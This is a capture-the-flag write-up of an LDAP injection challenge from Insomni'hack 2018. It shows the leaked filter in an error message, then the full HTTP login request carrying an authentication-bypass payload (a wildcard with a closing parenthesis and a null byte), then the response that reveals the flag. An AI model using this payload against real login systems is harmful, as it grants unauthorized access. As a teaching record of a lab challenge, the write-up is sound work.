This challenge was about LDAP injection.

Our Solution

The error message made it obvious:

<p>Error when trying to get LDAP entries for ou=web,dc=inso, filter (&(uid=*)(uid=*))(|(uid=*)(userpassword={MD5}kS7IA7LOSeSlQQaNSVq1cA==))</p>		<form method="POST">

Then it was only a matter of finding the right payload. After fiddling with the requests manually we ended up submitting a list of known payload one after the other using Burp Intruder and one worked out of the box. The final request was:

POST / HTTP/1.1
Host: authent-service.insomni.hack
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,fr;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://authent-service.insomni.hack/
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

username=%2a))%00&password=asdf

And the response included the flag:

HTTP/1.1 200 OK
Date: Fri, 23 Mar 2018 20:33:05 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 510
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>
	<style>
		body {
			background-color:#799;
		}

		.authent-box {
			background-color:#eee;
			width:30%;
			margin:0 auto;
			padding:50px;
			margin-top:50px;
			border-radius:10px;
		}
	</style>
</head>
<body>
	<div class="authent-box">
		<p>You're connected. The flag is INS{ld4p_1nject10n_1s_0ld} !</p>		<form method="POST">
			<input name="username" placeholder="username" />
			<input name="password" placeholder="password" />
			<input type="submit" />
		</form>
	</div>
</body>
</html>